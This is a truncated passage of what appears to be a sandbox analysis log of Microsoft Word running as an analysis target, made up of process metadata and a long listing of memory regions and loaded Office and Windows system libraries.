# Flog Txt Version 1 # Analyzer Version: 2.2.0 # Analyzer Build Date: Aug 15 2017 17:43:44 # Log Creation Date: 17.08.2017 13:53:07.238 Process: id = "1" image_name = "winword.exe" filename = "c:\\program files\\microsoft office\\root\\office16\\winword.exe" page_root = "0x5afcc000" os_pid = "0x9d8" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x0" cmd_line = "\"C:\\Program Files\\Microsoft Office\\Root\\Office16\\WINWORD.EXE\"" cur_dir = "C:\\Users\\aETAdzjz\\Desktop\\" os_username = "YKYD69Q\\aETAdzjz" os_groups = "YKYD69Q\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:00010cdc" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 134 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 135 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 136 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 137 start_va = 0x40000 end_va = 0x43fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 138 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 139 start_va = 0xc0000 end_va = 0xc0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 140 start_va = 0xd0000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 141 start_va = 0x1d0000 end_va = 0x1d0fff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 142 start_va = 0x1e0000 end_va = 0x1e0fff entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 143 start_va = 0x1f0000 end_va = 0x2effff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 144 start_va = 0x2f0000 end_va = 0x2f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 145 start_va = 0x300000 end_va = 0x306fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000300000" filename = "" Region: id = 146 start_va = 0x310000 end_va = 0x311fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000310000" filename = "" Region: id = 147 start_va = 0x320000 end_va = 0x320fff entry_point = 0x0 region_type = private name = "private_0x0000000000320000" filename = "" Region: id = 148 start_va = 0x330000 end_va = 0x330fff entry_point = 0x0 region_type = private name = "private_0x0000000000330000" filename = "" Region: id = 149 start_va = 0x340000 end_va = 0x341fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000340000" filename = "" Region: id = 150 start_va = 0x350000 end_va = 0x351fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000350000" filename = "" Region: id = 151 start_va = 0x360000 end_va = 0x362fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000360000" filename = "" Region: id = 152 start_va = 0x370000 end_va = 0x37ffff entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 153 start_va = 0x380000 end_va = 0x382fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000380000" filename = "" Region: id = 154 start_va = 0x390000 end_va = 0x392fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000390000" filename = "" Region: id = 155 start_va = 0x3a0000 end_va = 0x3a2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 156 start_va = 0x3b0000 end_va = 0x3b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 157 start_va = 0x3c0000 end_va = 0x3c7fff entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 158 start_va = 0x3d0000 end_va = 0x3d1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 159 start_va = 0x3e0000 end_va = 0x4dffff entry_point = 0x0 region_type = private name = "private_0x00000000003e0000" filename = "" Region: id = 160 start_va = 0x4e0000 end_va = 0x667fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 161 start_va = 0x670000 end_va = 0x670fff entry_point = 0x0 region_type = private name = "private_0x0000000000670000" filename = "" Region: id = 162 start_va = 0x680000 end_va = 0x68ffff entry_point = 0x0 region_type = private name = "private_0x0000000000680000" filename = "" Region: id = 163 start_va = 0x690000 end_va = 0x810fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000690000" filename = "" Region: id = 164 start_va = 0x820000 end_va = 0x1c1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000820000" filename = "" Region: id = 165 start_va = 0x1c20000 end_va = 0x1eeefff entry_point = 0x1c20000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 166 start_va = 0x1ef0000 end_va = 0x22e2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ef0000" filename = "" Region: id = 167 start_va = 0x22f0000 end_va = 0x23effff entry_point = 0x0 region_type = private name = "private_0x00000000022f0000" filename = "" Region: id = 168 start_va = 0x23f0000 end_va = 0x242ffff entry_point = 0x0 region_type = private name = "private_0x00000000023f0000" filename = "" Region: id = 169 start_va = 0x2430000 end_va = 0x2430fff entry_point = 0x0 region_type = private name = "private_0x0000000002430000" filename = "" Region: id = 170 start_va = 0x2440000 end_va = 0x2440fff entry_point = 0x0 region_type = private name = "private_0x0000000002440000" filename = "" Region: id = 171 start_va = 0x2450000 end_va = 0x2450fff entry_point = 0x0 region_type = private name = "private_0x0000000002450000" filename = "" Region: id = 172 start_va = 0x2460000 end_va = 0x2460fff entry_point = 0x0 region_type = private name = "private_0x0000000002460000" filename = "" Region: id = 173 start_va = 0x2470000 end_va = 0x2474fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002470000" filename = "" Region: id = 174 start_va = 0x2480000 end_va = 0x248ffff entry_point = 0x0 region_type = private name = "private_0x0000000002480000" filename = "" Region: id = 175 start_va = 0x2490000 end_va = 0x256efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002490000" filename = "" Region: id = 176 start_va = 0x2570000 end_va = 0x2597fff entry_point = 0x0 region_type = private name = "private_0x0000000002570000" filename = "" Region: id = 177 start_va = 0x25a0000 end_va = 0x25a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000025a0000" filename = "" Region: id = 178 start_va = 0x25b0000 end_va = 0x25b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000025b0000" filename = "" Region: id = 179 start_va = 0x25c0000 end_va = 0x25c0fff entry_point = 0x0 region_type = private name = "private_0x00000000025c0000" filename = "" Region: id = 180 start_va = 0x25d0000 end_va = 0x25d1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000025d0000" filename = "" Region: id = 181 start_va = 0x25e0000 end_va = 0x25e0fff entry_point = 0x25e0000 region_type = mapped_file name = "msxml6r.dll" filename = "\\Windows\\System32\\msxml6r.dll" (normalized: "c:\\windows\\system32\\msxml6r.dll") Region: id = 182 start_va = 0x25f0000 end_va = 0x266ffff entry_point = 0x0 region_type = private name = "private_0x00000000025f0000" filename = "" Region: id = 183 start_va = 0x2670000 end_va = 0x272ffff entry_point = 0x2670000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 184 start_va = 0x2730000 end_va = 0x279afff entry_point = 0x0 region_type = private name = "private_0x0000000002730000" filename = "" Region: id = 185 start_va = 0x27a0000 end_va = 0x27d5fff entry_point = 0x27a0000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 186 start_va = 0x27e0000 end_va = 0x27e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000027e0000" filename = "" Region: id = 187 start_va = 0x27f0000 end_va = 0x28effff entry_point = 0x0 region_type = private name = "private_0x00000000027f0000" filename = "" Region: id = 188 start_va = 0x28f0000 end_va = 0x290efff entry_point = 0x28f0000 region_type = mapped_file name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000011.db" filename = "\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000011.db" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000011.db") Region: id = 189 start_va = 0x2910000 end_va = 0x2910fff entry_point = 0x0 region_type = private name = "private_0x0000000002910000" filename = "" Region: id = 190 start_va = 0x2920000 end_va = 0x2921fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002920000" filename = "" Region: id = 191 start_va = 0x2930000 end_va = 0x2940fff entry_point = 0x2930000 region_type = mapped_file name = "c_1255.nls" filename = "\\Windows\\System32\\C_1255.NLS" (normalized: "c:\\windows\\system32\\c_1255.nls") Region: id = 192 start_va = 0x2950000 end_va = 0x295ffff entry_point = 0x0 region_type = private name = "private_0x0000000002950000" filename = "" Region: id = 193 start_va = 0x2960000 end_va = 0x297ffff entry_point = 0x0 region_type = private name = "private_0x0000000002960000" filename = "" Region: id = 194 start_va = 0x2980000 end_va = 0x29fffff entry_point = 0x0 region_type = private name = "private_0x0000000002980000" filename = "" Region: id = 195 start_va = 0x2a00000 end_va = 0x2a1ffff entry_point = 0x0 region_type = private name = "private_0x0000000002a00000" filename = "" Region: id = 196 start_va = 0x2a20000 end_va = 0x2a3efff entry_point = 0x0 region_type = private name = "private_0x0000000002a20000" filename = "" Region: id = 197 start_va = 0x2a40000 end_va = 0x2b3ffff entry_point = 0x0 region_type = private name = "private_0x0000000002a40000" filename = "" Region: id = 198 start_va = 0x2b40000 end_va = 0x2b5ffff entry_point = 0x0 region_type = private name = "private_0x0000000002b40000" filename = "" Region: id = 199 start_va = 0x2b60000 end_va = 0x2b7ffff entry_point = 0x0 region_type = private name = "private_0x0000000002b60000" filename = "" Region: id = 200 start_va = 0x2b80000 end_va = 0x2b84fff entry_point = 0x2b80000 region_type = mapped_file name = "onbttnwd.dll" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\ONBttnWD.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\onbttnwd.dll") Region: id = 201 start_va = 0x2b90000 end_va = 0x2b93fff entry_point = 0x2b90000 region_type = mapped_file name = "stdole2.tlb" filename = "\\Windows\\System32\\stdole2.tlb" (normalized: "c:\\windows\\system32\\stdole2.tlb") Region: id = 202 start_va = 0x2ba0000 end_va = 0x2c9ffff entry_point = 0x0 region_type = private name = "private_0x0000000002ba0000" filename = "" Region: id = 203 start_va = 0x2ca0000 end_va = 0x2e9ffff entry_point = 0x0 region_type = private name = "private_0x0000000002ca0000" filename = "" Region: id = 204 start_va = 0x2ea0000 end_va = 0x2fd1fff entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 205 start_va = 0x2fe0000 end_va = 0x305efff entry_point = 0x2fe0000 region_type = mapped_file name = "segoeui.ttf" filename = "\\Windows\\Fonts\\segoeui.ttf" (normalized: "c:\\windows\\fonts\\segoeui.ttf") Region: id = 206 start_va = 0x3070000 end_va = 0x307ffff entry_point = 0x0 region_type = private name = "private_0x0000000003070000" filename = "" Region: id = 207 start_va = 0x30a0000 end_va = 0x319ffff entry_point = 0x0 region_type = private name = "private_0x00000000030a0000" filename = "" Region: id = 208 start_va = 0x3220000 end_va = 0x331ffff entry_point = 0x0 region_type = private name = "private_0x0000000003220000" filename = "" Region: id = 209 start_va = 0x3320000 end_va = 0x341ffff entry_point = 0x0 region_type = private name = "private_0x0000000003320000" filename = "" Region: id = 210 start_va = 0x3420000 end_va = 0x342ffff entry_point = 0x0 region_type = private name = "private_0x0000000003420000" filename = "" Region: id = 211 start_va = 0x3460000 end_va = 0x355ffff entry_point = 0x0 region_type = private name = "private_0x0000000003460000" filename = "" Region: id = 212 start_va = 0x3560000 end_va = 0x395ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003560000" filename = "" Region: id = 213 start_va = 0x3960000 end_va = 0x428ffff entry_point = 0x3960000 region_type = mapped_file name = "staticcache.dat" filename = "\\Windows\\Fonts\\StaticCache.dat" (normalized: "c:\\windows\\fonts\\staticcache.dat") Region: id = 214 start_va = 0x4290000 end_va = 0x438ffff entry_point = 0x0 region_type = private name = "private_0x0000000004290000" filename = "" Region: id = 215 start_va = 0x43e0000 end_va = 0x44dffff entry_point = 0x0 region_type = private name = "private_0x00000000043e0000" filename = "" Region: id = 216 start_va = 0x4530000 end_va = 0x462ffff entry_point = 0x0 region_type = private name = "private_0x0000000004530000" filename = "" Region: id = 217 start_va = 0x4670000 end_va = 0x476ffff entry_point = 0x0 region_type = private name = "private_0x0000000004670000" filename = "" Region: id = 218 start_va = 0x4780000 end_va = 0x47fffff entry_point = 0x0 region_type = private name = "private_0x0000000004780000" filename = "" Region: id = 219 start_va = 0x4800000 end_va = 0x4ffffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004800000" filename = "" Region: id = 220 start_va = 0x5000000 end_va = 0x50fffff entry_point = 0x0 region_type = private name = "private_0x0000000005000000" filename = "" Region: id = 221 start_va = 0x5100000 end_va = 0x51fffff entry_point = 0x0 region_type = private name = "private_0x0000000005100000" filename = "" Region: id = 222 start_va = 0x5200000 end_va = 0x52fffff entry_point = 0x0 region_type = private name = "private_0x0000000005200000" filename = "" Region: id = 223 start_va = 0x53c0000 end_va = 0x53cffff entry_point = 0x0 region_type = private name = "private_0x00000000053c0000" filename = "" Region: id = 224 start_va = 0x53d0000 end_va = 0x57cffff entry_point = 0x0 region_type = private name = "private_0x00000000053d0000" filename = "" Region: id = 225 start_va = 0x57d0000 end_va = 0x67cffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000057d0000" filename = "" Region: id = 226 start_va = 0x6860000 end_va = 0x68dffff entry_point = 0x0 region_type = private name = "private_0x0000000006860000" filename = "" Region: id = 227 start_va = 0x69a0000 end_va = 0x6a1ffff entry_point = 0x0 region_type = private name = "private_0x00000000069a0000" filename = "" Region: id = 228 start_va = 0x6ab0000 end_va = 0x6b2ffff entry_point = 0x0 region_type = private name = "private_0x0000000006ab0000" filename = "" Region: id = 229 start_va = 0x6b30000 end_va = 0x6f2ffff entry_point = 0x0 region_type = private name = "private_0x0000000006b30000" filename = "" Region: id = 230 start_va = 0x6f50000 end_va = 0x704ffff entry_point = 0x0 region_type = private name = "private_0x0000000006f50000" filename = "" Region: id = 231 start_va = 0x7050000 end_va = 0x784ffff entry_point = 0x0 region_type = private name = "private_0x0000000007050000" filename = "" Region: id = 232 start_va = 0x7850000 end_va = 0x7c50fff entry_point = 0x0 region_type = private name = "private_0x0000000007850000" filename = "" Region: id = 233 start_va = 0x7c60000 end_va = 0x8060fff entry_point = 0x0 region_type = private name = "private_0x0000000007c60000" filename = "" Region: id = 234 start_va = 0x8070000 end_va = 0x8470fff entry_point = 0x0 region_type = private name = "private_0x0000000008070000" filename = "" Region: id = 235 start_va = 0x8480000 end_va = 0x867ffff entry_point = 0x0 region_type = private name = "private_0x0000000008480000" filename = "" Region: id = 236 start_va = 0x8680000 end_va = 0x8b3ffff entry_point = 0x0 region_type = private name = "private_0x0000000008680000" filename = "" Region: id = 237 start_va = 0x8b40000 end_va = 0x8f3ffff entry_point = 0x0 region_type = private name = "private_0x0000000008b40000" filename = "" Region: id = 238 start_va = 0x8f40000 end_va = 0x903ffff entry_point = 0x0 region_type = private name = "private_0x0000000008f40000" filename = "" Region: id = 239 start_va = 0x36fc0000 end_va = 0x36fcffff entry_point = 0x0 region_type = private name = "private_0x0000000036fc0000" filename = "" Region: id = 240 start_va = 0x6fff0000 end_va = 0x6fffffff entry_point = 0x0 region_type = private name = "private_0x000000006fff0000" filename = "" Region: id = 241 start_va = 0x744f0000 end_va = 0x74522fff entry_point = 0x744f0000 region_type = mapped_file name = "osppc.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPC.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\officesoftwareprotectionplatform\\osppc.dll") Region: id = 242 start_va = 0x76fb0000 end_va = 0x770a9fff entry_point = 0x76fb0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 243 start_va = 0x770b0000 end_va = 0x771cefff entry_point = 0x770b0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 244 start_va = 0x771d0000 end_va = 0x77378fff entry_point = 0x771d0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 245 start_va = 0x773a0000 end_va = 0x773a6fff entry_point = 0x773a0000 region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\System32\\psapi.dll" (normalized: "c:\\windows\\system32\\psapi.dll") Region: id = 246 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 247 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 248 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 249 start_va = 0x13f3f0000 end_va = 0x13f5cafff entry_point = 0x13f3f0000 region_type = mapped_file name = "winword.exe" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE" (normalized: "c:\\program files\\microsoft office\\root\\office16\\winword.exe") Region: id = 250 start_va = 0x7febdf90000 end_va = 0x7febdf9ffff entry_point = 0x0 region_type = private name = "private_0x000007febdf90000" filename = "" Region: id = 251 start_va = 0x7fee3f20000 end_va = 0x7fee4a18fff entry_point = 0x7fee3f20000 region_type = mapped_file name = "chart.dll" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\CHART.DLL" (normalized: "c:\\program files\\microsoft office\\root\\office16\\chart.dll") Region: id = 252 start_va = 0x7fee4a20000 end_va = 0x7fee4c42fff entry_point = 0x7fee4a20000 region_type = mapped_file name = "riched20.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\RICHED20.DLL" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\riched20.dll") Region: id = 253 start_va = 0x7fee4d70000 end_va = 0x7fee4edffff entry_point = 0x7fee4d70000 region_type = mapped_file name = "msptls.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\MSPTLS.DLL" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\msptls.dll") Region: id = 254 start_va = 0x7fee4ee0000 end_va = 0x7fee505afff entry_point = 0x7fee4ee0000 region_type = mapped_file name = "msointl.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\1033\\MSOINTL.DLL" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\1033\\msointl.dll") Region: id = 255 start_va = 0x7fee5060000 end_va = 0x7fee511bfff entry_point = 0x7fee5060000 region_type = mapped_file name = "wwintl.dll" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\1033\\WWINTL.DLL" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\wwintl.dll") Region: id = 256 start_va = 0x7fee5120000 end_va = 0x7fee9f5efff entry_point = 0x7fee5120000 region_type = mapped_file name = "msores.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\MSORES.DLL" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\msores.dll") Region: id = 257 start_va = 0x7fee9f60000 end_va = 0x7feea880fff entry_point = 0x7fee9f60000 region_type = mapped_file name = "mso99lres.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\MSO99LRES.DLL" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\mso99lres.dll") Region: id = 258 start_va = 0x7feea890000 end_va = 0x7feeab97fff entry_point = 0x7feea890000 region_type = mapped_file name = "mso40uires.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\MSO40UIRES.DLL" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\mso40uires.dll") Region: id = 259 start_va = 0x7feeaba0000 end_va = 0x7feebe7bfff entry_point = 0x7feeaba0000 region_type = mapped_file name = "mso.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\MSO.DLL" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\mso.dll") Region: id = 260 start_va = 0x7feebe80000 end_va = 0x7feec64bfff entry_point = 0x7feebe80000 region_type = mapped_file name = "mso99lwin32client.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\Mso99Lwin32client.dll" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\mso99lwin32client.dll") Region: id = 261 start_va = 0x7feec650000 end_va = 0x7feecf3afff entry_point = 0x7feec650000 region_type = mapped_file name = "mso40uiwin32client.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\Mso40UIwin32client.dll" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\mso40uiwin32client.dll") Region: id = 262 start_va = 0x7feecf40000 end_va = 0x7feed3b7fff entry_point = 0x7feecf40000 region_type = mapped_file name = "mso30win32client.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\Mso30win32client.dll" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\mso30win32client.dll") Region: id = 263 start_va = 0x7feed3c0000 end_va = 0x7feed6c3fff entry_point = 0x7feed3c0000 region_type = mapped_file name = "mso20win32client.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\Mso20win32client.dll" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\mso20win32client.dll") Region: id = 264 start_va = 0x7feed6d0000 end_va = 0x7feee83bfff entry_point = 0x7feed6d0000 region_type = mapped_file name = "oart.dll" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\OART.DLL" (normalized: "c:\\program files\\microsoft office\\root\\office16\\oart.dll") Region: id = 265 start_va = 0x7feee840000 end_va = 0x7fef0bdefff entry_point = 0x7feee840000 region_type = mapped_file name = "wwlib.dll" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\WWLIB.DLL" (normalized: "c:\\program files\\microsoft office\\root\\office16\\wwlib.dll") Region: id = 266 start_va = 0x7fef0d70000 end_va = 0x7fef0e08fff entry_point = 0x7fef0d70000 region_type = mapped_file name = "mscoreei.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscoreei.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\mscoreei.dll") Region: id = 267 start_va = 0x7fef0e10000 end_va = 0x7fef0f8dfff entry_point = 0x7fef0e10000 region_type = mapped_file name = "dwrite.dll" filename = "\\Windows\\System32\\DWrite.dll" (normalized: "c:\\windows\\system32\\dwrite.dll") Region: id = 268 start_va = 0x7fef0f90000 end_va = 0x7fef115ffff entry_point = 0x7fef0f90000 region_type = mapped_file name = "d3d10warp.dll" filename = "\\Windows\\System32\\d3d10warp.dll" (normalized: "c:\\windows\\system32\\d3d10warp.dll") Region: id = 269 start_va = 0x7fef11e0000 end_va = 0x7fef1219fff entry_point = 0x7fef11ea5b8 region_type = mapped_file name = "onbttnwd.dll" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\ONBttnWD.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\onbttnwd.dll") Region: id = 270 start_va = 0x7fef1220000 end_va = 0x7fef125afff entry_point = 0x7fef1220000 region_type = mapped_file name = "mlang.dll" filename = "\\Windows\\System32\\mlang.dll" (normalized: "c:\\windows\\system32\\mlang.dll") Region: id = 271 start_va = 0x7fef1710000 end_va = 0x7fef177efff entry_point = 0x7fef1710000 region_type = mapped_file name = "mscoree.dll" filename = "\\Windows\\System32\\mscoree.dll" (normalized: "c:\\windows\\system32\\mscoree.dll") Region: id = 272 start_va = 0x7fef1780000 end_va = 0x7fef1845fff entry_point = 0x7fef1780000 region_type = mapped_file name = "d3d11.dll" filename = "\\Windows\\System32\\d3d11.dll" (normalized: "c:\\windows\\system32\\d3d11.dll") Region: id = 273 start_va = 0x7fef18f0000 end_va = 0x7fef18fefff entry_point = 0x7fef18f0000 region_type = mapped_file name = "msointl30.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\1033\\msointl30.dll" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\1033\\msointl30.dll") Region: id = 274 start_va = 0x7fef1900000 end_va = 0x7fef1926fff entry_point = 0x7fef1900000 region_type = mapped_file name = "sppc.dll" filename = "\\Windows\\System32\\sppc.dll" (normalized: "c:\\windows\\system32\\sppc.dll") Region: id = 275 start_va = 0x7fef3a40000 end_va = 0x7fef3a4bfff entry_point = 0x7fef3a40000 region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll") Region: id = 276 start_va = 0x7fef3ee0000 end_va = 0x7fef40d1fff entry_point = 0x7fef3ee0000 region_type = mapped_file name = "msxml6.dll" filename = "\\Windows\\System32\\msxml6.dll" (normalized: "c:\\windows\\system32\\msxml6.dll") Region: id = 277 start_va = 0x7fef41b0000 end_va = 0x7fef4220fff entry_point = 0x7fef41b0000 region_type = mapped_file name = "winspool.drv" filename = "\\Windows\\System32\\winspool.drv" (normalized: "c:\\windows\\system32\\winspool.drv") Region: id = 278 start_va = 0x7fef45e0000 end_va = 0x7fef45e2fff entry_point = 0x7fef45e0000 region_type = mapped_file name = "api-ms-win-core-file-l1-2-0.dll" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\api-ms-win-core-file-l1-2-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\api-ms-win-core-file-l1-2-0.dll") Region: id = 279 start_va = 0x7fef45f0000 end_va = 0x7fef45f2fff entry_point = 0x7fef45f0000 region_type = mapped_file name = "api-ms-win-core-processthreads-l1-1-1.dll" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\api-ms-win-core-processthreads-l1-1-1.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\api-ms-win-core-processthreads-l1-1-1.dll") Region: id = 280 start_va = 0x7fef4600000 end_va = 0x7fef4602fff entry_point = 0x7fef4600000 region_type = mapped_file name = "api-ms-win-core-synch-l1-2-0.dll" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\api-ms-win-core-synch-l1-2-0.dll") Region: id = 281 start_va = 0x7fef4610000 end_va = 0x7fef4612fff entry_point = 0x7fef4610000 region_type = mapped_file name = "api-ms-win-core-localization-l1-2-0.dll" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\api-ms-win-core-localization-l1-2-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\api-ms-win-core-localization-l1-2-0.dll") Region: id = 282 start_va = 0x7fef4620000 end_va = 0x7fef4622fff entry_point = 0x7fef4620000 region_type = mapped_file name = "api-ms-win-core-file-l2-1-0.dll" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\api-ms-win-core-file-l2-1-0.dll" (normalized: "c:\\program files\\microsoft 